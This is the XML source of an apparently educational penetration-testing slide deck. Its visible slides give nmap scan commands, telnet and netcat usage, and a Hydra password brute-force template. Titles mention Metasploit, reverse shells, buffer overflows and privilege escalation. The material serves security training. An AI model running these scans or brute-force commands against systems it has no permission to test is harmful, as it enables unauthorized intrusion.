        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37700387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7" name="Oval 16">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7" name="Straight Connector 2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Content Placeholder 4" descr="A blue and white sign&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70754BE5-62C6-F12F-5A69-B441DC49FE45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="2502"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="626590" y="317578"/>
            <a:ext cx="10851111" cy="3508437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32" name="Group 31">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3" name="Straight Connector 32">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DE85C0C2-6967-5853-3F95-A7E51AC22C25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="961869" y="938492"/>
            <a:ext cx="5881383" cy="2490508"/>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000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3 Rooms Nmap: Live Host Discovery , Basic Port Scans , Post Port Scans</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" b="1" dirty="0">
              <a:ln w="22225">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:miter lim="800000"/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70984F90-8B32-4CC4-A284-FDC6F160F2B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1164734" y="4018143"/>
            <a:ext cx="9995451" cy="2129599"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ping Scans (ICMP):   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &lt;target&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ARP Scans :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -PR &lt;target&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UDP Ping: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -PU53 &lt;target&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Service Version Details: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &lt;target&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1743145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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29"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3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="36"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network diagram&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F8819DA-64B3-233E-887B-DEB6AC7EC287}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="35000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="-2109019"/>
            <a:ext cx="12191980" cy="8967019"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0B0712A-1EDC-3019-33FB-E544886F4228}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545690" y="365126"/>
            <a:ext cx="10808110" cy="1286694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 Rooms : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Protocols and Servers and Protocols and Servers 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA432FC4-21AB-5805-89B2-C2E638EB6F12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545690" y="1651820"/>
            <a:ext cx="10808110" cy="4525143"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Common Protocols and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Ports:like</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> HTTP (port 80), HTTPS (port 443), FTP (port 21), SSH (port 22), SMTP (Simple Mail Transfer Protocol, port 25) ,SMB (Server Message Block, port 445</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Tool Telnet :Telnet can be used to manually connect to services on certain ports, interact with them (telnet &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt; &lt;port&gt;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>  :for manual service interaction (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt; &lt;port&gt; )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Tool Hydra for Brute-forcing : hydra -l &lt;user&gt; -P &lt;password-list&gt; &lt;target-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt; &lt;service&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73C7289F-E3CA-C497-0A53-6C48BE04147F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="545689" y="5886539"/>
            <a:ext cx="83328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panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Port like SMTP: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t> --script smtp-commands &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="2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47478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fade">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22"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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29"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CD8762-B282-FA80-2790-C864704F01AF}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 4" descr="A screenshot of a computer program&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D6972E1-195B-ABB0-B87F-861F35A7D8F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="35345"/>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DEC457E6-04F7-AFDC-15EE-9B391C64C35D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523875" y="5317240"/>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chemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>INSTANT Machine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49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E1AC7D-38F5-3E3C-CD23-BCD34DA66E5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E3AAD9-C082-A650-522C-E395A8C43127}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="640080"/>
            <a:ext cx="4818888" cy="1481328"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>Information Gathering (Reconnaissance)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6600" b="1" dirty="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8E4D07-9542-C568-3FE9-6C0478D2D880}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="2660904"/>
            <a:ext cx="4818888" cy="3547872"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Simple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> test to see available ports on the machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The website didn't have anything to be scanned or enumerated but a single download button which downloads an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A computer screen shot of a program&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF3B97DC-55C1-8A5A-05AF-8F174CC73D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435" y="2158419"/>
            <a:ext cx="6092953" cy="3714384"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1128988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1719</TotalTime>
  <Words>2486</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>299</Paragraphs>
  <Slides>58</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__Inter_d65c78</vt:lpstr>
      <vt:lpstr>Aptos</vt:lpstr>
      <vt:lpstr>Aptos Display</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Roboto Bold</vt:lpstr>
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>SFMono-Regular</vt:lpstr>
      <vt:lpstr>Source Sans Pro</vt:lpstr>
      <vt:lpstr>Symbol</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Group Anonymous</vt:lpstr>
      <vt:lpstr>Mina Ghattas</vt:lpstr>
      <vt:lpstr>2 Rooms Pentesting Fundamentals and Principles of Security</vt:lpstr>
      <vt:lpstr>Mina Ghattas</vt:lpstr>
      <vt:lpstr>Passive Reconnaissance"</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>2 Rooms : Protocols and Servers and Protocols and Servers 2</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Information Gathering (Reconnaissance)</vt:lpstr>
      <vt:lpstr>Information Gathering</vt:lpstr>
      <vt:lpstr>Static Analysis</vt:lpstr>
      <vt:lpstr>Analysis of Gathered Data (Vulnerability Identification)</vt:lpstr>
      <vt:lpstr>What are Vulnerabilities?</vt:lpstr>
      <vt:lpstr>Importance of Understanding Vulnerabilities</vt:lpstr>
      <vt:lpstr>Vulnerability Categories</vt:lpstr>
      <vt:lpstr>Vulnerability Scoring</vt:lpstr>
      <vt:lpstr>Introduction to Metasploit</vt:lpstr>
      <vt:lpstr>Introduction to Metasploit</vt:lpstr>
      <vt:lpstr>Key Concepts in Metasploit</vt:lpstr>
      <vt:lpstr>Metasploit Basics &amp; Scanning</vt:lpstr>
      <vt:lpstr>Meterpreter Overview &amp; Flavors</vt:lpstr>
      <vt:lpstr>Meterpreter Commands &amp; Post Exploitation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Buffer Overflow Attack</vt:lpstr>
      <vt:lpstr>Buffer Overflow Attack</vt:lpstr>
      <vt:lpstr>Immunity Debugger</vt:lpstr>
      <vt:lpstr>Mona</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Mohamed Wael</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Banner Grabbing ( during enumeration )</vt:lpstr>
      <vt:lpstr>Reverse shell</vt:lpstr>
      <vt:lpstr>LinEnum</vt:lpstr>
      <vt:lpstr>PrivescCheck (Windows)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>privilege escalation by brute force</vt:lpstr>
      <vt:lpstr>At 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Mina</dc:creator>
  <cp:lastModifiedBy>Mina</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-22T16:46:17Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-24T16:58:34Z</dcterms:modified>
</cp:coreProperties>
</file>